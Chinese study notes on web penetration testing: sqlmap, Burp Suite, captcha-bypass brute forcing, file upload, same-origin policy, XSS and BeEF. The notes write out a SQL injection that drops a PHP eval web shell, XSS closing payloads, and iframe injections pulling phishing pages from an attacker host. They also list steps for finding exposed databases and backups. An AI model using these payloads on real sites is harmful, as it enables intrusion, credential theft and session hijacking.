sqlmap续
注入语句(知道绝对路径时候可用)
http://192.168.99.171/test2/sqli/example10.php?catid=3’union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php‘--+
检测注入:http://192.168.99.171/test/xinyu2.php若有返回内容则已经写入
form表单
--random-agent 随机请求
--cookie=COOKIE 身份赋予
--technique=TECH SQL injection techniques to use (default "BEUSTQ")T时间E错误C
--dns-domain=DNS.. Domain name used for DNS exfiltration attack
--DNS域=DNS..用于DNS渗出攻击的域名
burp与wireshark的区别
http协议抓包工具burp,能改能发,实时互动
wireshark不能改只能抓住
burp:
target(目标) proxy(代理) spider scanner intruder repeater sequencer decoder compare extend options
详情:
https://blog.csdn.net/lynnlinlin/article/details77488947/
http://blog.csdn.net/lynnlinlin/article/details/76736972
http://blog.csdn.net/lynnlinlin/article/details/77480726
1) Proxy(代理)
代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,修改代理配置. 在这里我们可以编辑代理正在监听的端口.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。这意味着在同一网络中的任何计算机都可以使用Burp Proxy功能成为代理,并中继通过它的流量. "support invisible proxying for non-proxy-aware client"选项是用于客户端不知道他们使用的是代理的情况下.这意味着代理设置不是设置在浏览器,有时候设置在hosts文件中.在这种情况下,和将代理选项设置在浏览器本身所不同的是Burp需要知道它是从一个非代理客户端接收流量的."redirect to host"和"redirect to port"选项将客户端重定向到我们在该选项后设置的主机和端口。 这里有个选项用来修改从响应中接收到的html网页。我们可以取消隐藏的表单字段,删除javascript等。还有一个选项用自定义字符串替换掉寻找到的特定的模式.我们需要用指定正则表达式。Burp将解析请求或者响应以期望能够寻找到这种模式,将会用自定义的字符串来替换它.一旦Burp Spider提交一个登陆表单的时候就开始爬行(抓取).它可以自动提交我们提供给它的证书.我们同样可以设置admin/password凭证,设置好之后,他们会做为DVWA中的凭证.因此Burp Spider可以自动提交那些信息凭证,并且保持爬行抓取的状态希望能够获得更多的新的信息.你也可以在thread(线程)项来修改线程数. 这样就会启动Burp Spider,在Spider control标签下我们会看到正在做出的请求,我们也可以为Burp Spider自定义一个范围.
2)Intruder(入侵)
Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp Suite的Intruder对DVWA进行暴力猜解攻击.浏览到DVWA,单击"Burp Force(暴力猜解)",随便输入username和password,确保Burp Suite上的"intercept is on(监听是打开的)".然后点击登陆 以上的操作会将请求信息发送给intruder功能.进入intruder标签,配置Burp Suite来发起暴力猜解的攻击.在target标签下可以看到已经设置好了要请求攻击的目标 单击右边的"clear"按钮,将会删除所有用不同颜色演示的重要的信息.接下来我们需要配置Burp在这次攻击中只把用户名和密码做为参数.选中本次请求中的username(本例中用户名是指"infosecinstiture")然后单击"Add(添加)".同样的将本次请求中的password也添加进去.这样操作之后,用户名和密码将会成为第一个和第二个参数.一旦你操作完成,输出的样子应该如下图所示: 接下来我们需要设置这次攻击的攻击类型,默认情况下的攻击类型是"Sniper(狙击手)",在本例中,我们将使用"Cluster Bomb(集束炸弹)"的攻击类型.有四种攻击类型,分别是singer,battering ram,pitchfork,cluster bomb.下图中我们看到的我们的攻击类型是"Cluster Bomb' 进入payload标签,确保"payload set"的值是1,点击"load(加载)"加载一个包含用户名的文件 。本例中我们使用一个很小的文件来进行演示.加载之后用户名文件中的用户名会如下图所示 同样设置"payload set"的值为2,点击"load"加载一个密码字典文件。 进入"options"标签,确保results下的"store requests"和"store responses"已经选择.
3)Repeater(中继转发) 通过Burp Repeater功能,我们可以手动修改一个请求,并且发送出去,来分析返回的响应.我们需要从不同的地方发送请求给Burp Repeater,比如入侵者,代理等.发送一个请求给Repeater,只需要单击右键"send to Repeater". 点开Repeater标签,会看到request,也可以看到名为1,2,3的3个标签. 我们也可以看到requestparams,header,hex和raw格式的请求,发送请求之前,我们可以修改其中的任何一个. 只修改Params请求下的username=admin,password=password,点击go,这样就会发送这个请求. 我们可以分析response部分返回的响应.
fuzz(模糊测试)
文件上传
第一个被检测而第二个不被检测
双文件上传
inurl:/ewebeditor.mdbà查找数据库
1.管理员后台
2.整站的rar压缩包(***.rar||***.zip)à代码审计
3.编辑器页面 和编辑器管理员后台à弱口令à文件上传
4.留言板à留言板后台à弱口令à文件上传
5.整站,编辑器,留言板的mdb数据库文件à下载数据库获得用户名密码
6.bak后缀文件(网站源码的备份文件)à拿到网站源码
7.其他攻击者留下的木马à破解密码登录
8.网站安装时留下的说明文件à敏感目录和初始用户名密码
GET POST
GET--》HEAD
index.php登录进去的界面
login.php登录界面
admin/verifycode.php验证代码(丢弃它)
绕过验证码(cookie)(burp)【刷新无效】à爆破登录
- 原理:验证码往往是单独的一个请求,如果不让它跳转就一直有效(丢弃验证的)
- 过程:
- 启动burp和一个打开的登录界面
- 在repeater里放弃一个验证的请求
- 到了提示密码错误或者用户名错误而不是验证码错误的时候,你就成功了
- 然后开始进行用户名密码爆破(用户名可以写一些注入语句)
- 比对长度查看与众不同的就是
- 注意:速度别太快…数据库会哭死的
脑痛的同源策略(约定判断四要素,cookie)
1.host(域名或ip地址,如果是ip地址则看做一个根域名)
2.子域名
3.端口
4.协议
流动ip
花生壳(动态dns解析)内网穿刺(带你的木马找到回家的路)
以及,翻墙…
神奇的xss(精通JavaScript):
1.xss的原理:
脚本会在用户的浏览器上执行,从而达到攻击者的各种目的。
客户端嵌入恶意脚本代码
2.xss类型:
(1)反射型
(2)存储型
(3)本地型(dom型)
1.反射型:(php网页)
(1)恶意的客户端代码(html/javascript),是在服务器端合成的
(2)客户输入什么,不做检测,直接原样在客户端显示和执行
2.本地型(dom型):
DOM:document对象,是在JavaScript当中的一种元素
(1)恶意的客户端代码(html/javascript),是在浏览器端合成的
(2)客户输入什么,不做检测,直接原样在客户端显示和执行
3.存储型:
(1)恶意的客户端代码(html/javascript),存入数据库,或其他持久化形式
(2)客户输入什么,不做检测,直接原样在客户端显示和执行
(3)恶意代码在服务器端合成
beef神器
防beef静止浏览器多次请求,进行360防御-.-
使用详情http://netsecurity.51cto.com/art/201307/402179.htm
BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。
beef beef
假设此时目标192.168.11.1的服务器访问了这个demo页面
http://192.168.11.152:3000/demos/basic.html。则就被hook上了,
实施攻击 HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。 其中,4种颜色分别表示: 该攻击模块可用,且隐蔽性强 该攻击模块可用,但隐蔽性差 该用户模块是否可用还有待验证 该攻击模块不可用
username=[X]
xss:
闭合:
"><script>alert(1)</script>
"/></textarea><script>alert(1)</script>
注意观察网页源码来使其闭合
xss盗取cookie
cookie即为身份,交流的牌牌,有一个其他人的身份你就成了其他人,然后一不小心就浏览到了后台页面
xss注入点:任意的输入位置,有输入,就有xss。
xss语句
<iframe src="http://www.hacker.com/xss/dy.html" height="400" width="100%" scrolling="no" frameborder="0"></iframe>
<iframe src="http://www.hacker.com//xss/login.html" height="100%" width="100%" scrolling="no" frameborder="0" style="position:absolute;top:0;margin:0;padding:0;left:0;
z-index:99999999;"></iframe>
短网址生成
来源:https://www.cnblogs.com/fytech-/p/10462964.html